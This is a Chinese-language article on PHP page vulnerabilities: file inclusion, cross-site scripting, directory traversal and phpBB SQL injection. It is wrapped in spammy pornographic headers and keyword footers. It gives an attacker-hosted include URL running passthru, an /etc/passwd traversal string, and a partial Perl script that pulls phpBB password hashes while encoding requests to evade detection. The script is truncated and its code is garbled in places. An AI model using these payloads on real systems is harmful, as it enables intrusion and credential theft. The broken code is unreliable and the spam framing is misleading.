日本搞逼视频_黄色一级片免费在线观看_色99久久_性明星video另类hd_欧美77_综合在线视频

國(guó)內(nèi)最全I(xiàn)T社區(qū)平臺(tái) 聯(lián)系我們 | 收藏本站
阿里云優(yōu)惠2
您當(dāng)前位置:首頁(yè) > php開源 > php教程 > php頁(yè)面漏洞分析及相關(guān)問(wèn)題解決

php頁(yè)面漏洞分析及相關(guān)問(wèn)題解決

來(lái)源:程序員人生   發(fā)布時(shí)間:2014-01-15 15:12:09 閱讀次數(shù):3459次

從現(xiàn)在的網(wǎng)絡(luò)安全來(lái)看,大家最關(guān)注和接觸最多的WEB頁(yè)面漏洞應(yīng)該是ASP了,在這方面,小竹是專家,我沒(méi)發(fā)言權(quán)。然而在PHP方面來(lái)看,也同樣存在很嚴(yán)重的安全問(wèn)題,但是這方面的文章卻不多。在這里,就跟大家來(lái)稍微的討論一下PHP頁(yè)面的相關(guān)漏洞吧。

我對(duì)目前常見(jiàn)的PHP漏洞做了一下總結(jié),大致分為以下幾種:包含文件漏洞,腳本命令執(zhí)行漏洞,文件泄露漏洞,SQL注入漏洞等幾種。當(dāng)然,至于COOKIE欺騙等一部分通用的技術(shù)就不在這里討論了,這些資料網(wǎng)上也很多。那么,我們就一個(gè)一個(gè)來(lái)分析一下怎樣利用這些漏洞吧!

首先,我們來(lái)討論包含文件漏洞。這個(gè)漏洞應(yīng)該說(shuō)是PHP獨(dú)有的吧。這是由于不充分處理外部提供的惡意數(shù)據(jù),從而導(dǎo)致遠(yuǎn)程攻擊者可以利用這些漏洞以WEB進(jìn)程權(quán)限在系統(tǒng)上執(zhí)行任意命令。我們來(lái)看一個(gè)例子:假設(shè)在a.php中有這樣一句代碼:

以下是引用片段:

  1. include($include."/xxx.php"); ?> 

在這段代碼中,$include一般是一個(gè)已經(jīng)設(shè)置好的路徑,但是我們可以通過(guò)自己構(gòu)造一個(gè)路徑來(lái)達(dá)到攻擊的目的。比方說(shuō)我們提交:a.php?include=http://web/b.php,這個(gè)web是我們用做攻擊的空間,當(dāng)然,b.php也就是我們用來(lái)攻擊的代碼了。我們可以在b.php中寫入類似于:passthru("/bin/ls /etc");的代碼。這樣,就可以執(zhí)行一些有目的的攻擊了。(注:Web服務(wù)器應(yīng)該不能執(zhí)行php代碼,不然就出問(wèn)題了。相關(guān)詳情可以去看<<如何對(duì)PHP程序中的常見(jiàn)漏洞進(jìn)行攻擊>>)。在這個(gè)漏洞方面,出狀況的很多,比方說(shuō):PayPal Store Front,HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些。

接著,我們?cè)賮?lái)看一下腳本命令執(zhí)行漏洞。這是由于對(duì)用戶提交的URI參數(shù)缺少充分過(guò)濾,提交包含惡意HTML代碼的數(shù)據(jù),可導(dǎo)致觸發(fā)跨站腳本攻擊,可能獲得目標(biāo)用戶的敏感信息。我們也舉個(gè)例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁(yè)面對(duì)PHPSESSID缺少充分的過(guò)濾,我們可以通過(guò)這樣的代碼來(lái)達(dá)到攻擊的目的:http://web/index.php?PHPSESSID=">在script里面我們可以構(gòu)造函數(shù)來(lái)獲得用戶的一些敏感信息。在這個(gè)漏洞方面相對(duì)要少一點(diǎn),除了PHP Transparent之外還有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等。

再然后,我們就來(lái)看看文件泄露漏洞了,這種漏洞是由于對(duì)用戶提交參數(shù)缺少充分過(guò)濾,遠(yuǎn)程攻擊者可以利用它進(jìn)行目錄遍歷攻擊以及獲取一些敏感信息。我們拿最近發(fā)現(xiàn)的phpMyAdmin來(lái)做例子。在phpMyAdmin中,export.php頁(yè)面沒(méi)有對(duì)用戶提交的'what'參數(shù)進(jìn)行充分過(guò)濾,遠(yuǎn)程攻擊者提交包含多個(gè)'../'字符的數(shù)據(jù),便可繞過(guò)WEB ROOT限制,以WEB權(quán)限查看系統(tǒng)上的任意文件信息。比方說(shuō)打入這樣一個(gè)地址:export.php?what=../../../../../../etc/passwd%00 就可以達(dá)到文件泄露的目的了。在這方面相對(duì)多一點(diǎn),有:myPHPNuke,McNews等等。

最后,我們又要回到最興奮的地方了。想想我們平時(shí)在asp頁(yè)面中用SQL注入有多么爽,以前還要手動(dòng)注入,一直到小竹悟出"SQL注入密笈"(嘿嘿),然后再開做出NBSI以后,我們NB聯(lián)盟真是拉出一片天空。曾先后幫CSDN,大富翁論壇,中國(guó)頻道等大型網(wǎng)站找出漏洞。(這些廢話不多說(shuō)了,有點(diǎn)跑題了...)。

還是言規(guī)正傳,其實(shí)在asp中SQL的注入和php中的SQL注入大致相同,只不過(guò)稍微注意一下用的幾個(gè)函數(shù)就好了。將asc改成ASCII,len改成LENGTH,其他函數(shù)基本不變了。其實(shí)大家看到PHP的SQL注入,是不是都會(huì)想到PHP-NUKE和PHPBB呢?不錯(cuò),俗話說(shuō)樹大招分,像動(dòng)網(wǎng)這樣的論壇在asp界就該是漏洞這王了,這并不是說(shuō)它的論壇安全太差,而是名氣太響,別人用的多了,研究的人也就多了,發(fā)現(xiàn)的安全漏洞也就越多了。PHPBB也是一樣的,現(xiàn)在很大一部分人用PHP做論壇的話,一般都是選擇了PHPBB。它的漏洞也是一直在出,從最早phpBB.com phpBB 1.4.0版本被人發(fā)現(xiàn)漏洞,到現(xiàn)在最近的phpBB 2.0.6版本的groupcp.php,,以及之前發(fā)現(xiàn)的search.php,profile.php,viewtopic.php等等加起來(lái),大概也有十來(lái)個(gè)樣子吧。這也一直導(dǎo)致,一部分人在研究php漏洞的時(shí)候都會(huì)拿它做實(shí)驗(yàn)品,所謂百練成精嘛,相信以后的PHPBB會(huì)越來(lái)越好。

好了,我們還是來(lái)分析一下漏洞產(chǎn)生的原因吧。拿viewtopic.php頁(yè)面來(lái)說(shuō),由于在調(diào)用viewtopic.php時(shí),直接從GET請(qǐng)求中獲得"topic_id"并傳遞給SQL查詢命令,而并沒(méi)有進(jìn)行一些過(guò)濾的處理,攻擊者可以提交特殊的SQL字符串用于獲得MD5密碼,獲得此密碼信息可以用于自動(dòng)登錄或者進(jìn)行暴力破解。(我想應(yīng)該不會(huì)有人想去暴力破解吧,除非有特別重要的原因)。先看一下相關(guān)源代碼:

以下是引用片段:

  1. #   if(isset($HTTP_GET_VARS[POST_TOPIC_URL]))  
  2.   #   {  
  3.   #      $topic_id=intval($HTTP_GET_VARS[POST_TOPIC_URL]);  
  4.   #   }  
  5.   #   elseif(isset($HTTP_GET_VARS['topic']))  
  6.   #   {  
  7.   #      $topic_id=intval($HTTP_GET_VARS['topic']);  
  8.   #   } 

從上面我們可以看出,如果提交的view=newest并且sid設(shè)置了值的話,執(zhí)行的查詢代碼像下面的這個(gè)樣子(如果你還沒(méi)看過(guò)PHPBB源代碼的話,建議你看了再對(duì)著這里來(lái)看,受影響系統(tǒng)為:phpBB 2.0.5和phpBB 2.0.4)。

以下是引用片段:

  1. #        $sql = "SELECT p.post_id  
  2.   #        FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u  
  3.   #        WHERE s.session_id = '$session_id' 
  4.   #         AND u.user_id = s.session_user_id  
  5.   #         AND p.topic_id = $topic_id 
  6.   #         AND p.post_time >= u.user_lastvisit  
  7.   #        ORDER BY p.post_time ASC  
  8.   #        LIMIT 1";  
  9.   Rick提供了下面的這斷測(cè)試代碼:  
  10.   use IO::Socket;  
  11.   $remote = shift || 'localhost';  
  12.   $view_topic = shift || '/phpBB2/viewtopic.php';  
  13.   $uid = shift || 2;  
  14.   $port = 80;  
  15.   $dBType = 'mysql4';   # mysql4 or pgsql  
  16.   print "Trying to get password hash for uid $uid server $remote dbtype: $dBType ";  
  17.   $p = "";  
  18.   for($index=1; $index<=32; $index++)  
  19.   {  
  20.   $socket = IO::Socket::INET->new(PeerAddr => $remote,  
  21.   PeerPort => $port,  
  22.   Proto => "tcp",  
  23.   Type => SOCK_STREAM)  
  24.   or die "Couldnt connect to $remote:$port : $@ ";  
  25.   $str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0 ";  
  26.   print $socket $str;  
  27.   print $socket "Cookie: phpBB2mysql_sid=1 ";  # replace this for pgsql or remove it  
  28.   print $socket "Host: $remote ";  
  29.   while ($answer = <$socket>)  
  30.   {  
  31.   if ($answer =~ /location:.*x23(d+)/) # Matches the location: viewtopic.php?p=#  
  32.   {  
  33.   $p .= chr ();  
  34.   }  
  35.   }  
  36.   close($socket);  
  37.   }  
  38.   print " MD5 Hash for uid $uid is $p ";  
  39.   # random encode str. helps avoid detection  
  40.   sub random_encode  
  41.   {  
  42.   $str = shift;  
  43.   $ret = "";  
  44.   for($i=0; $i 
  45.   {  
  46.   $c = substr($str,$i,1);  
  47.   $j = rand length($str) * 1000;  
  48.     
  49.     
  50.   if (int($j) % 2 || $c eq ' ')  
  51.   {  
  52.   $ret .= "%" . sprintf("%x",ord($c));  
  53.   } 
生活不易,碼農(nóng)辛苦
如果您覺(jué)得本網(wǎng)站對(duì)您的學(xué)習(xí)有所幫助,可以手機(jī)掃描二維碼進(jìn)行捐贈(zèng)
程序員人生
------分隔線----------------------------
分享到:
------分隔線----------------------------
關(guān)閉
程序員人生
主站蜘蛛池模板: 久久久69| 黄色av国产 | 亚洲一区二区三区在线播放 | 99久久久久国产精品免费 | 久久精品日韩 | 天天操夜夜摸 | 国产乱码一区二区三区 | 国产成人精品久久二区二区91 | 国产伦精品一区二区三区视频金莲 | 免费黄色小片 | 久久久观看 | a级网站 | 久久亚洲国产精品 | 欧美日韩精品综合 | 高清在线一区二区 | 免费日韩一区二区 | 久久久亚洲综合 | 欧美 日韩 国产 成人 在线 | 国户精品久久久久久久久久久不卡 | 亚洲久久久久 | 一区二区av在线 | 久久精品夜夜夜夜夜久久 | 成人香蕉视频在线观看 | 久久精品国产欧美亚洲人人爽 | 俺来也在线视频 | 国产美女视频网站 | 香蕉视频色版在线观看 | 国产在线精品一区二区三区 | 又紧又大又爽精品一区二区 | 天堂在线精品 | 99久久99久久精品免费看蜜桃 | 久久久久久久久久久网站 | 中文字幕av网 | 国产伦精品一区二区三区精品视频 | 成人污污视频 | 亚洲精品久久久久中文字幕二区 | 做a视频在线观看 | 国产精品1区 | 久久久免费精品 | 中文成人在线 | 欧美日韩不卡在线 |